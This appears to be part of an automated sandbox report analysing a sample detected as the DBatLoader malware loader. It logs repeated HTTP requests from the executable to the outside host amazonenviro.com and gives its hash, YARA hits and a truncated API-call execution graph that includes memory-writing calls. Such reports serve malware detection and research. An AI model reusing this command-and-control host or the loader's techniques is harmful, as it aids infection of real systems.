                    2025-01-14 07:24:45 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:44 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    65192.168.2.450133166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:24:46 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:47 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:47 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    66192.168.2.450135166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:24:48 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:48 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:48 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    67192.168.2.450137166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:24:49 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:50 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:50 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    68192.168.2.450139166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:24:51 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:52 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:51 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    69192.168.2.450141166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:24:53 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:53 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:53 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    70192.168.2.450143166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:24:54 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:55 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:55 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    71192.168.2.450145166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:24:56 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:56 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:56 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    72192.168.2.450147166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:24:58 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:58 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:58 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    73192.168.2.450149166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:24:59 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:25:00 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:25:00 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    74192.168.2.450151166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:25:01 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:25:01 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:25:01 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    75192.168.2.450153166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:25:02 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:25:03 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:25:03 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    76192.168.2.450155166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:25:04 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:25:05 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:25:04 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Statistics

                    CPU Usage

                    Click to jump to process

                    Memory Usage

                    Click to jump to process

                    High Level Behavior Distribution

                    Click to dive into process behavior distribution

                    System Behavior

                    General

                    Target ID:0
                    Start time:02:22:57
                    Start date:14/01/2025
                    Path:C:\Users\user\Desktop\LbZ88q4uPa.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\LbZ88q4uPa.exe"
                    Imagebase:0x400000
                    File size:1'161'216 bytes
                    MD5 hash:BF9B75ADF866583299DBC8A5FAD66CFC
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:Borland Delphi
                    Yara matches:
                    • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.2954365899.000000007FBB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.2938050052.0000000002296000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:false

                    Disassembly

                    Reset < >

                      Execution Graph

                      Execution Coverage:6.3%
                      Dynamic/Decrypted Code Coverage:100%
                      Signature Coverage:14.6%
                      Total number of Nodes:268
                      Total number of Limit Nodes:16
                      execution_graph 25693 285e2e4 25694 285e2f2 VariantClear 25693->25694 25695 285e2ff 25693->25695 25707 285dfb0 25694->25707 25697 285e315 25695->25697 25698 285e306 25695->25698 25700 285e2fd 25697->25700 25701 285e336 25697->25701 25702 285e32d 25697->25702 25711 28544ac 25698->25711 25716 2862e24 EnterCriticalSection LeaveCriticalSection 25701->25716 25715 285e168 52 API calls 25702->25715 25705 285e33f 25705->25700 25706 285e34f VariantClear VariantInit 25705->25706 25706->25700 25708 285dfb4 25707->25708 25709 285dfb9 25707->25709 25717 285dd5c 43 API calls 25708->25717 25709->25700 25712 28544b2 25711->25712 25713 28544cd 25711->25713 25712->25713 25718 2852c2c 11 API calls 25712->25718 25713->25700 25715->25700 25716->25705 25717->25709 25718->25713 25719 2851c6c 25720 2851d04 25719->25720 25721 2851c7c 25719->25721 25724 2851d0d 25720->25724 25725 2851f58 25720->25725 25722 2851cc0 25721->25722 25723 2851c89 25721->25723 25729 2851724 10 API calls 25722->25729 25726 2851c94 25723->25726 25767 2851724 25723->25767 25728 2851d25 25724->25728 25742 2851e24 25724->25742 25727 2851fec 25725->25727 25731 2851fac 25725->25731 25732 2851f68 25725->25732 25734 2851d2c 25728->25734 25738 2851d48 25728->25738 25743 2851dfc 25728->25743 25750 2851cd7 25729->25750 25735 2851fb2 25731->25735 25740 2851724 10 API calls 25731->25740 25736 2851724 10 API calls 25732->25736 25733 2851e7c 25737 2851724 10 API calls 25733->25737 25752 2851e95 25733->25752 25757 2851f82 25736->25757 25754 2851f2c 25737->25754 25744 2851d79 Sleep 25738->25744 25759 2851d9c 25738->25759 25739 2851cfd 25758 2851fc1 25740->25758 25741 2851cb9 25742->25733 25747 2851e55 Sleep 25742->25747 25742->25752 25745 2851724 10 API calls 25743->25745 25748 2851d91 Sleep 25744->25748 25744->25759 25761 2851e05 25745->25761 25746 2851fa7 25747->25733 25751 2851e6f Sleep 25747->25751 25748->25738 25749 2851ca1 25749->25741 25791 2851a8c 25749->25791 25750->25739 25756 2851a8c 8 API calls 25750->25756 25751->25742 25754->25752 25760 2851a8c 8 API calls 25754->25760 25755 2851e1d 25756->25739 25757->25746 25762 2851a8c 8 API calls 25757->25762 25758->25746 25763 2851a8c 8 API calls 25758->25763 25764 2851f50 25760->25764 25761->25755 25765 2851a8c 8 API calls 25761->25765 25762->25746 25766 2851fe4 25763->25766 25765->25755 25768 285173c 25767->25768 25769 2851968 25767->25769 25779 28517cb Sleep 25768->25779 25782 285174e 25768->25782 25770 2851a80 25769->25770 25771 2851938 25769->25771 25773 2851684 VirtualAlloc 25770->25773 25774 2851a89 25770->25774 25775 2851947 Sleep 25771->25775 25784 2851986 25771->25784 25772 285175d 25772->25749 25776 28516bf 25773->25776 25777 28516af 25773->25777 25774->25749 25778 285195d Sleep 25775->25778 25775->25784 25776->25749 25808 2851644 25777->25808 25778->25771 25779->25782 25783 28517e4 Sleep 25779->25783 25781 285182c 25789 2851838 25781->25789 25814 28515cc 25781->25814 25782->25772 25782->25781 25785 285180a Sleep 25782->25785 25783->25768 25786 28519a4 25784->25786 25787 28515cc VirtualAlloc 25784->25787 25785->25781 25788 2851820 Sleep 25785->25788 25786->25749 25787->25786 25788->25782 25789->25749 25792 2851aa1 25791->25792 25793 2851b6c 25791->25793 25795 2851aa7 25792->25795 25796 2851b13 Sleep 25792->25796 25794 28516e8 25793->25794 25793->25795 25798 2851c66 25794->25798 25801 2851644 2 API calls 25794->25801 25797 2851ab0 25795->25797 25800 2851b4b Sleep 25795->25800 25805 2851b81 25795->25805 25796->25795 25799 2851b2d Sleep 25796->25799 25797->25741 25798->25741 25799->25792 25802 2851b61 Sleep 25800->25802 25800->25805 25803 28516f5 VirtualFree 25801->25803 25802->25795 25804 285170d 25803->25804 25804->25741 25806 2851c00 VirtualFree 25805->25806 25807 2851ba4 25805->25807 25806->25741 25807->25741 25809 2851681 25808->25809 25810 285164d 25808->25810 25809->25776 25810->25809 25811 285164f Sleep 25810->25811 25812 2851664 25811->25812 25812->25809 25813 2851668 Sleep 25812->25813 25813->25810 25818 2851560 25814->25818 25816 28515d4 VirtualAlloc 25817 28515eb 25816->25817 25817->25789 25819 2851500 25818->25819 25819->25816 25820 287d2fc 25830 2856518 25820->25830 25824 287d32a 25835 287bf84 timeSetEvent 25824->25835 25826 287d334 25827 287d342 GetMessageA 25826->25827 25828 287d336 TranslateMessage DispatchMessageA 25827->25828 25829 287d352 25827->25829 25828->25827 25831 2856523 25830->25831 25836 2854168 25831->25836 25834 285427c SysAllocStringLen SysFreeString SysReAllocStringLen 25834->25824 25835->25826 25837 28541ae 25836->25837 25838 2854227 25837->25838 25839 28543b8 25837->25839 25850 2854100 25838->25850 25841 28543e9 25839->25841 25845 28543fa 25839->25845 25855 285432c GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 25841->25855 25844 28543f3 25844->25845 25846 285443f FreeLibrary 25845->25846 25847 2854463 25845->25847 25846->25845 25848 2854472 ExitProcess 25847->25848 25849 285446c 25847->25849 25849->25848 25851 2854143 25850->25851 25852 2854110 25850->25852 25851->25834 25852->25851 25854 28515cc VirtualAlloc 25852->25854 25856 2855814 25852->25856 25854->25852 25855->25844 25857 2855824 GetModuleFileNameA 25856->25857 25858 2855840 25856->25858 25860 2855a78 GetModuleFileNameA RegOpenKeyExA 25857->25860 25858->25852 25861 2855afb 25860->25861 25862 2855abb RegOpenKeyExA 25860->25862 25878 28558b4 12 API calls 25861->25878 25862->25861 25863 2855ad9 RegOpenKeyExA 25862->25863 25863->25861 25865 2855b84 lstrcpynA GetThreadLocale GetLocaleInfoA 25863->25865 25867 2855c9e 25865->25867 25868 2855bbb 25865->25868 25866 2855b20 RegQueryValueExA 25869 2855b40 RegQueryValueExA 25866->25869 25870 2855b5e RegCloseKey 25866->25870 25867->25858 25868->25867 25872 2855bcb lstrlenA 25868->25872 25869->25870 25870->25858 25873 2855be3 25872->25873 25873->25867 25874 2855c30 25873->25874 25875 2855c08 lstrcpynA LoadLibraryExA 25873->25875 25874->25867 25876 2855c3a lstrcpynA LoadLibraryExA 25874->25876 25875->25874 25876->25867 25877 2855c6c lstrcpynA LoadLibraryExA 25876->25877 25877->25867 25878->25866 25879 2854c48 25880 2854c4c 25879->25880 25881 2854c6f 25879->25881 25882 2854c0c 25880->25882 25885 2854c5f SysReAllocStringLen 25880->25885 25883 2854c20 25882->25883 25884 2854c12 SysFreeString 25882->25884 25884->25883 25885->25881 25886 2854bdc 25885->25886 25887 2854bf8 25886->25887 25888 2854be8 SysAllocStringLen 25886->25888 25888->25886 25888->25887 25889 287bf78 25892 286f0a8 25889->25892 25893 286f0b0 25892->25893 25893->25893 29074 2868704 LoadLibraryW 25893->29074 25895 286f0d2 29079 2852ee0 QueryPerformanceCounter 25895->29079 25897 286f0d7 25898 286f0e1 InetIsOffline 25897->25898 25899 286f0fc 25898->25899 25900 286f0eb 25898->25900 25902 2854500 11 API calls 25899->25902 29091 2854500 25900->29091 25903 286f0fa 25902->25903 29082 285480c 25903->29082 29097 28680c0 29074->29097 29076 286873d 29108 2867cf8 29076->29108 29080 2852eed 29079->29080 29081 2852ef8 GetTickCount 29079->29081 29080->25897 29081->25897 29083 285481d 29082->29083 29084 2854843 29083->29084 29085 285485a 29083->29085 29087 2854b78 11 API calls 29084->29087 29086 2854570 11 API calls 29085->29086 29088 2854850 29086->29088 29087->29088 29089 285488b 29088->29089 29090 2854500 11 API calls 29088->29090 29090->29089 29092 2854504 29091->29092 29095 2854514 29091->29095 29094 2854570 11 API calls 29092->29094 29092->29095 29093 2854542 29093->25903 29094->29095 29095->29093 29177 2852c2c 11 API calls 29095->29177 29098 2854500 11 API calls 29097->29098 29099 28680e5 29098->29099 29122 286790c 29099->29122 29103 28680ff 29104 2868107 GetModuleHandleW GetProcAddress GetProcAddress 29103->29104 29105 286813a 29104->29105 29143 28544d0 29105->29143 29109 2854500 11 API calls 29108->29109 29110 2867d1d 29109->29110 29111 286790c 12 API calls 29110->29111 29112 2867d2a 29111->29112 29113 2854798 11 API calls 29112->29113 29114 2867d3a 29113->29114 29166 2868018 29114->29166 29117 28680c0 15 API calls 29118 2867d53 NtWriteVirtualMemory 29117->29118 29119 2867d7f 29118->29119 29120 28544d0 11 API calls 29119->29120 29121 2867d8c FreeLibrary 29120->29121 29121->25895 29123 286791d 29122->29123 29147 2854b78 29123->29147 29125 2867999 29128 2854798 29125->29128 29126 286792d 29126->29125 29156 285ba3c CharNextA 29126->29156 29129 28547fd 29128->29129 29130 285479c 29128->29130 29131 28547a4 29130->29131 29132 2854500 29130->29132 29131->29129 29133 28547b3 29131->29133 29135 2854500 11 API calls 29131->29135 29136 2854570 11 API calls 29132->29136 29138 2854514 29132->29138 29137 2854570 11 API calls 29133->29137 29134 2854542 29134->29103 29135->29133 29136->29138 29140 28547cd 29137->29140 29138->29134 29164 2852c2c 11 API calls 29138->29164 29141 2854500 11 API calls 29140->29141 29142 28547f9 29141->29142 29142->29103 29144 28544d6 29143->29144 29145 28544fc 29144->29145 29165 2852c2c 11 API calls 29144->29165 29145->29076 29148 2854b85 29147->29148 29155 2854bb5 29147->29155 29150 2854bae 29148->29150 29151 2854b91 29148->29151 29149 28544ac 11 API calls 29153 2854b9f 29149->29153 29158 2854570 29150->29158 29157 2852c44 11 API calls 29151->29157 29153->29126 29155->29149 29156->29126 29157->29153 29159 2854574 29158->29159 29160 2854598 29158->29160 29163 2852c10 11 API calls 29159->29163 29160->29155 29162 2854581 29162->29155 29163->29162 29164->29134 29165->29144 29167 2854500 11 API calls 29166->29167 29168 286803b 29167->29168 29169 286790c 12 API calls 29168->29169 29170 2868048 29169->29170 29171 2868050 GetModuleHandleA 29170->29171 29172 28680c0 15 API calls 29171->29172 29173 2868061 GetModuleHandleA 29172->29173 29174 286807f 29173->29174 29175 28544ac 11 API calls 29174->29175 29176 2867d4d 29175->29176 29176->29117 29177->29093

                      Executed Functions

                      Function 0286F0A8 Relevance: 243.3, APIs: 11, Strings: 122, Instructions: 10535filesleepCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 0 286f0a8-286f0ab 1 286f0b0-286f0b5 0->1 1->1 2 286f0b7-286f0e9 call 2868704 call 2852ee0 call 2852f08 InetIsOffline 1->2 9 286f0fc-286f106 call 2854500 2->9 10 286f0eb-286f0fa call 2854500 2->10 14 286f10b-286f3ce call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 286efc8 9->14 10->14 115 286f3d4-286f3db call 286f024 14->115 116 287ae5e-287b3d4 call 28544d0 * 5 call 2854c0c call 28544ac call 2854c0c call 28544d0 call 28544ac call 28544d0 * 2 call 2854c0c call 28544d0 * 2 call 28544ac call 28544d0 call 28544ac call 28544d0 * 2 call 2854c0c call 28544d0 call 2854c0c call 28544d0 * 4 call 2854c0c call 28544ac call 2854c0c call 28544d0 * 2 call 28544ac call 28544d0 call 2854c24 call 28544d0 call 2854c24 call 28544d0 call 2854c0c call 28544ac call 2854c0c call 28544d0 * 2 call 28544ac call 2854c0c call 28544ac call 2854c0c call 28544d0 call 2854c0c call 28544ac call 2854c0c call 28544d0 call 2854c0c call 28544ac call 2854c0c call 28544d0 call 2854c0c call 28544ac call 2854c0c call 28544d0 * 2 call 2854c0c call 28544ac call 2854c0c call 28544d0 * 2 call 28544ac call 28544d0 call 2855788 call 28544d0 call 28544ac call 28544d0 * 2 call 285e374 call 28544d0 call 2855e58 call 28544d0 * 4 call 2855788 call 28544d0 call 2855788 call 28544d0 call 2854c0c call 28544d0 call 2854c0c call 28544ac call 28544d0 call 28544ac call 28544d0 call 2855788 call 28544d0 call 2854c0c call 28544d0 * 4 call 28544ac call 28544d0 14->116 115->116 122 286f3e1-286fd02 call 28546a4 * 2 call 286881c call 28546a4 * 2 call 286881c call 28546a4 * 2 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 28546a4 * 2 call 286881c call 28546a4 * 2 call 286881c call 28546a4 * 2 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 28546a4 * 2 call 286881c call 28546a4 * 2 call 286881c call 28546a4 * 2 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 28546a4 * 2 call 286881c call 28546a4 * 2 call 286881c call 28546a4 * 2 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 28546a4 * 2 call 286881c call 28546a4 * 2 call 286881c call 28546a4 * 2 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 286894c call 285494c call 28546a4 call 286e36c call 2854500 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 2854798 call 2857e10 115->122 592 286fe15-286ff28 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 286e36c call 2854500 122->592 593 286fd08-286fe10 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 2854500 122->593 655 286ff2d-2870055 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285c2e4 call 2854500 592->655 593->655 688 2870057-287005a 655->688 689 287005c-287041d call 28549ac call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 286e36c call 2854500 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285494c call 28546a4 call 2857e10 655->689 688->689 800 2870423-2870878 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 2854d8c call 286dfe4 call 2854500 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 286e4c0 call 28557c4 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 2854500 call 286e448 689->800 801 2870bdf-28711b7 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 2854d8c call 286dfe4 call 2854500 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 286e4c0 call 28557c4 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 2854500 * 2 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 286e448 689->801 1055 287087e-2870bda call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285494c call 2854d20 call 286dfe4 call 2854500 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c 800->1055 1056 28723b9-28725bc call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c 800->1056 801->1056 1187 28711bd-28716ec call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 2857a80 call 286ea4c call 2854500 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 286e4c0 call 28557c4 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c 801->1187 1055->1056 1225 28725c3-28725c8 1056->1225 1226 28725be-28725c1 1056->1226 1539 28716f6-287190b call 285480c call 285494c call 28546a4 call 2854798 call 285494c 